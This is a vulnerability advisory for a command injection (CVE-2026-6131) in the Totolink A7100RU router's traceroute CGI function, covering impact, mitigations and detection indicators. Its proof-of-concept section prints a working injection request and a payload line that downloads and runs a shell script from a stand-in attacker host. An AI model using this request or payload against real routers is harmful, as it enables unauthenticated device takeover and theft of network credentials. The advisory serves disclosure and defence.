Executive Summary
A critical OS command injection vulnerability (CVE-2026-6131) has been identified in the Totolink A7100RU wireless router running firmware version 7.4cu.2313_b20191024. The flaw resides in the setTracerouteCfg function of the CGI handler /cgi-bin/cstecgi.cgi. By manipulating the command argument, a remote unauthenticated attacker can inject and execute arbitrary operating system commands on the affected device.
CVSS Score: 9.8 (Critical)
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Vulnerability Overview
| Attribute | Value |
|---|---|
| CVE ID | CVE-2026-6131 |
| CVSS Score | 9.8 (Critical) |
| Type | OS Command Injection |
| Component | setTracerouteCfg in /cgi-bin/cstecgi.cgi |
| Attack Vector | Network |
| Attack Complexity | Low |
| Privileges Required | None |
| User Interaction | None |
| Confidentiality / Integrity / Availability | High / High / High |
| Published | 2026-04-12 |
Affected Products
| Product | Firmware Version | Status |
|---|---|---|
| Totolink A7100RU | 7.4cu.2313_b20191024 | Vulnerable — no patch available |
The Totolink A7100RU is a SOHO (small office/home office) dual-band wireless router. Devices with this firmware version and web management interfaces exposed to the network are at risk.
Technical Details
Vulnerability Mechanism
The /cgi-bin/cstecgi.cgi CGI handler exposes router management functions. The setTracerouteCfg function is designed to configure and initiate traceroute diagnostics. It accepts a command parameter that is passed directly to a shell execution function without sanitization or escaping, enabling injection of arbitrary OS commands through shell metacharacters.
Proof-of-Concept Attack Pattern
POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: <router-ip>
Content-Type: application/x-www-form-urlencoded
action=setTracerouteCfg&command=8.8.8.8;id;A payload such as 8.8.8.8;wget http://attacker.com/shell.sh -O /tmp/s;sh /tmp/s would download and execute a remote payload on the router.
Why CVSS 9.8?
The combination of network-accessible attack vector, no authentication required, no user interaction, and full C/I/A impact yields a near-maximum CVSS score. The only reason it does not reach 10.0 is the Scope: Unchanged metric.
Impact Assessment
| Impact Area | Description |
|---|---|
| Remote Code Execution | Arbitrary command execution as the CGI process user (typically root on embedded devices) |
| Full Device Compromise | Attacker can modify router configuration, firmware, and routing tables |
| Network Pivoting | Compromised router can be used to attack internal LAN hosts |
| Botnet Recruitment | Device can be enrolled into a DDoS botnet (e.g., Mirai variants) |
| Credential Theft | Router admin credentials, Wi-Fi PSKs, and VPN configs can be extracted |
| Traffic Interception | DNS hijacking and traffic redirection affecting all devices on the network |
Recommendations
Immediate Actions
- Disable remote web management — ensure the router's admin interface is not accessible from the WAN port
- Place the router behind a firewall — restrict access to the management interface to trusted LAN hosts only
- Check for firmware updates — monitor Totolink's official support pages for a patched firmware release
- Change default admin credentials — use a strong, unique admin password to reduce exposure from adjacent vulnerabilities
- Consider replacement — if the device is end-of-life or no patch is forthcoming, replace it with a supported model
Network-Level Mitigations
- Block port 80/443 inbound on the WAN interface via upstream firewall rules
- Restrict management UI access to specific management VLAN or host IPs
- Deploy IDS/IPS signatures to detect anomalous CGI POST requests targeting setTracerouteCfg
- Monitor for unexpected outbound connections from the router's WAN IPDetection Indicators
| Indicator | Description |
|---|---|
| Unexpected outbound HTTP(S) from router | Possible C2 beacon or payload download |
| New cron jobs or rc.d scripts | Persistence mechanisms installed post-exploitation |
| Unusual DNS responses on LAN | DNS hijacking for traffic interception |
| Router reboots or config changes | Post-exploitation configuration tampering |
Malformed POST requests to /cgi-bin/cstecgi.cgi | Exploitation attempts in access logs |
Post-Remediation Checklist
- Apply vendor patch when released and verify firmware integrity via checksum
- Factory reset and reconfigure the router from scratch after any suspected compromise
- Change all LAN device passwords that may have been intercepted via DNS hijacking
- Review DNS settings on all LAN devices to ensure they point to trusted resolvers
- Audit firewall rules to confirm WAN management access is blocked
Related Vulnerabilities
This CVE is part of a cluster of OS command injection vulnerabilities discovered in the same Totolink A7100RU firmware version:
- CVE-2026-6132 — OS command injection via
setLedCfg(enable parameter) - CVE-2026-6138 — OS command injection via
setAccessDeviceCfg(mac parameter)
The co-discovery of multiple injection points in the same CGI handler suggests a systemic lack of input validation across this firmware's management interface.